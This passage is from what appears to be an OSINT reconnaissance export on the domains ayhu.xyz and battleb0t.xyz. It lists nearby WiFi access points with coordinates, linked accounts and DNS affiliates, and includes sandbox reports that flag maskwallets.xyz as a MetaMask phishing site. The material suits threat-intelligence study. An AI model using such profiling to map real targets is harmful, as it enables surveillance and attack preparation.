WAG4K79Bs3Vtk5_YaWGKevDuxwe2PI4tgDIlPhm0aaMmefu_Aqbmk6Nh3efYd6tebEuF1GGAbp894vPoKIV_oMOG4605Orlbta-mL3BdBLdomEjXGBNzJc8zOt_diWLDMArzlhmqHj68HR17Jaa_r6ERT_jArQXozZtM_B3L5O8SpcafOJWm3x_EH-cSS-ttAlAlAFa0wgnswXzQF8jvtcMH7wOU4U6LjP8DMTOtT18J0nltl0j_q-DNG4lBHonjmIjyRSP8oBxk-3z89_7YNTov0awtqgzLFZw2_mSARwNl4_HaPezvCevT53qGnFReXcG3RzOMm4zSBZbENl_DwydIdBN0QqU0z3ekKIj0DHHzeDbwvLRQiV0Lv01I4DZBYzgAdCYmkN3aWrG0sAU92LemS02Ukd_enHt1XRhTQOnUlyr42CJb5OOWo8CjNFcGn16guPRfUma268s38K2-wnhjS9iCXiymmGF-AAdAizqUKdabbQOSsatJ602VLlNMiwTbinDbOME_fkBdTGzKnt5g_beyji9YWF9g5kjIdThtdFTLZ7VtxqQe64uUOYy3ZMXGyBjPj32wUf-c45ZB1IslXSI3TZ3dwmgQZ-iw9MFsb5EQblUq7mhT6th">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '13393',
cRay: '7c5f8c594cb34339',
cHash: '405751743fca02b',
cUPMDTk: "\/lol.html?__cf_chl_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'eSl90ERW3ieYQBiJ/CvInfpugLrCuGqtrxfN7Hff3XV1tnjtcokhOvtXLaw36vmuW/PZRZbPFRsBG1FZ2o1L9/qlyM29SttBrPr40sLGiM5zROAIfmkLKaU7gxLqLGeRmXOxLm0iruqXtWXcZfwzLJMR0QDa6PkszA2FQ43qwQdSl1Fas7lyf05ZYuhd21mKW7cO3qwZeh7EGOKQrSA2vqJVYFosW/VZvSBGX51hzStLgJo3UlZTpeKFoRGBNXR72ajQEJiUb1nCtKKxYTlVZS5ZMnpJ22NtZ33eAOm1lxwFp0ZWMwtEtyfr7+KjIQ7sSru0tnVtRMYbJHwTDL1YqCRM5I3BrwhMSJldfYZdxbXvKROe8SujCKguS6whGqpyPhrBZ0ynuTVosC8rK1X1RTGfwKn+lPWLzhRyW3E937dmzZ7Hr4MVk+jCtkCg7+HiFEo7Z5MPv1Dw/bUNeEjjhnMO6Bk/fpz1g8p9agnrrAYImdotjjffG+sx7LYboUY2eNvy7Cmsh5FjNxiOeltcpgD/DjxarQtoa+6blRoBMw8jV7vrsKw7K7t0fZ6oSnZa',
t: 'MTY4Mzg2MTg2MS4zMjkwMDA=',
m: 'wei6RtcHCTh5k6jXLRR9uxE1j0nSB1DRW6i/4ZVDPwA=',
i1: 'b4n+etCkfjlnsH7ziL0wjQ==',
i2: 'jFCNa6uhaxi0l2WjI6PNAA==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c594cb34339');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c594cb34339';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| https://ayhu.xyz/lol.html |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | BHS (Net ID: 00:02:A8:9A:AC:ED) | 50.1188, 8.6843 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom6C4B98 (Net ID: 00:0C:F6:6C:4B:98) | 50.8897, 6.0563 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | likeevideo (Category: social)
https://likee.video/@ayhu | ayhu |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CableWiFi (Net ID: 00:0D:67:2F:5E:C7) | 39.0469, -77.4903 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SurfandSip (Net ID: 00:02:2D:03:7C:7A) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | New Improved Mad Dogs Network (Net ID: 00:02:2D:02:1F:7E) | 37.7642, -122.3993 |
| 2023-05-12 03:08:52 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.131 | 34.148.97.127 |
| 2023-05-12 03:01:30 | Web Server | No | Tool - WhatWeb | 0 | 0 | 2 | 0 | None | cloudflare | nuke.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Sunshine (Net ID: 00:07:40:87:15:01) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:09:53 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.98 |
| 2023-05-12 02:44:28 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | battleb0t.github.io |
| 2023-05-12 02:45:45 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Chantilly', u'security': {u'is_vpn': False}, u'city_geoname_id': 4751935, u'region_geoname_id': 6254928, u'country': u'United States', u'region': u'Virginia', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'FASTLY', u'isp_name': u'American Registry Internet Numbers', u'organization_name': u'American Registry Internet Numbers', u'autonomous_system_number': 54113}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'20151', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:44'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2606:50c0:8000::153', u'continent': u'North America', u'region_iso_code': u'VA'} | 2606:50c0:8000::153 |
| 2023-05-12 02:47:34 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | | 185.199.111.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | uyDunet (Net ID: 00:13:33:8F:4F:14) | 40.2024, 29.0398 |
| 2023-05-12 02:54:21 | Web Content Type | No | Web Spider | 0 | 0 | 3 | 0 | None | text/html;charset=utf-8 | vscode.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:E8:37:B2) | 41.8781, -87.6298 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:7D:86:07) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:54:13 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://ayhu.xyz/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs | https://ayhu.xyz/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | AIRV_3DF5 (Net ID: 00:05:B9:42:3D:F8) | 39.0469, -77.4903 |
| 2023-05-12 02:59:57 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | support@bigmarker.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://click9.bigmarker.com/links/BY79pHvYX2Z/QPJiO7I68/tMwYeVPDKIXG/IN5CQt3PP-?bu=7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff5125d2b050eecdfd56122f5766da81f9380883c6330281152549d890a090250ca7457e3d6af512de37a44ef72cc832a7cff15e41cb02af8a17863d1d3fd8b23804d4f2277ba16828665e73cb7759a78343309ede93ee8fcceaf565cf60789ea78d923ffa76fe3d', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:2872:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:2872:120:WilError_01"\n "SM0:2872:120:WilError_01"\n "SM0:2872:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.231.70.218:443"\n "138.91.254.96:443"\n "3.235.65.215:443"\n "13.227.21.122:443"\n "185.199.108.153:443"\n "13.227.21.6:443"\n "151.101.0.176:443"\n "142.251.2.156:443"\n "151.101.2.137:443"\n "162.247.241.14:443"'}, {u'category': u'General', 
u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "click9.bigmarker.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: 
"urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:title" content="The Inbound Customer Experience">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:description" content="Our panelists will discuss a variety of questions including:" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512"), Found string "<meta name="twitter:image" content="https://d5ln38p3754yc.cloudfront.net/conference_icons/7821611/large/1677693079-c5b46aaa6c8ef248.jpg?1677693079">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: 
wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn 
tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\index"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_0"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_1"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_2"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_3"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\history"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\favicons"'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-396', u'name': u'Contains ability to create/modify Windows services (Powershell command string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="registrants-add-contents" style="padding-bottom: 28px">" (Indicator: "Add-Content"; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\636_742791881\\shopping.js]- [targetUID: 00000000-00000636]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00000636]\n "Ruleset Data" has type "da |
| 2023-05-12 02:48:19 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://g.width/386,g.getcontext(m', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://c.timestamp/1e3),a.data.set(ce,c.qa)));a.get(je)&&(c=a.get(se),d', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://math.pi/e,n=this.or.v,i=this.os.v,a=2*math.pi*n/(4*e),o=.5*-math.pi,s=3===this.data.d', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://maskwallets.xyz/forms/v2.js', u'type': u'visited', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://maskwallets.xyz/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3252"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_cb4_IESQMMUTEX_0_519"\n "IsoScope_cb4_ConnHashTable<3252>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_cb4_IESQMMUTEX_0_303"\n "IsoScope_cb4_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_cb4_IE_EarlyTabStart_0xb2c_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cb4_IESQMMUTEX_0_519"\n 
"\\Sessions\\1\\BaseNamedObjects\\IsoScope_cb4_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cb4_IESQMMUTEX_0_331"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"154.82.100.125:80"\n "172.217.164.106:443"\n "142.251.46.234:80"\n "142.250.189.163:80"\n "43.251.41.15:443"\n "104.17.211.243:443"\n "142.251.214.132:443"\n "142.251.32.35:443"\n "104.17.212.243:443"\n "43.251.41.5:443"\n "208.89.12.90:443"\n "142.250.189.163:443"\n "185.199.110.153:443"\n "208.89.12.87:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"maskwallets.xyz"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-3', u'name': u'Tries to GET non-existent files from a webserver', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: maskwallets.xyz\nDNT: 1\nConnection: Keep-Alive\nCookie: _ga=GA1.2.1689897167.1682546284; _gid=GA1.2.304489594.1682546284; _gat_gtag_UA_37075177_6=1; LPVID=EwOTcwNTgwYTNiMjZiNTE2; LPSID-88982875=upHQCJz-TiCz5i-z2-4hWg"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', 
u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"accdn.lpsnmedia.net"\n "ajax.googleapis.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "forms.hsforms.com"\n "lpcdn.lpsnmedia.net"\n "lptag.liveperson.net"\n "maskwallets.xyz"\n "metamask.io"\n "perf.hsforms.com"\n "va.v.liveperson.net"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "js_1_.js")\n Found string ".w-widget-twitter {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim * {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-clear {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical) {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before," (Indicator: "dir "; File: "webflow_1_.css")\n Found string 
".w-widget-twitter-count-shim:not(.w--vertical):after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large:before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large:after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical:before," (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical:after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical:before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Explore-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "wallet-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "Browse-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "mm-logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': 
u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced" and extension "png"\n "mm-shop-hoodie_1_.png" has type "PNG image data 786 x 786 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-axieinfinity_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "payload_1_.jpg" has type "JPEG image data JFIF standard 1.02 aspect ratio density 1x1 segment length 16 baseline precision 8 300x300 components 3" and extension "jpg"\n "dapp-aave_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-compound_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-uniswap_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-gitcoin_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-maker_1_.png" has type "Unknown" and extension "png"\n "dapp-rarible_1_.png" has type "Unknown" and extension "png"\n "dapp-opensea_1_.png" has type "Unknown" and extension "png"\n "info_2x_1_.png" has type "Unknown" and extension "png"\n "image_2x_1_.png" has type "Unknown" and extension "png"\n "refresh_2x_1_.png" has type 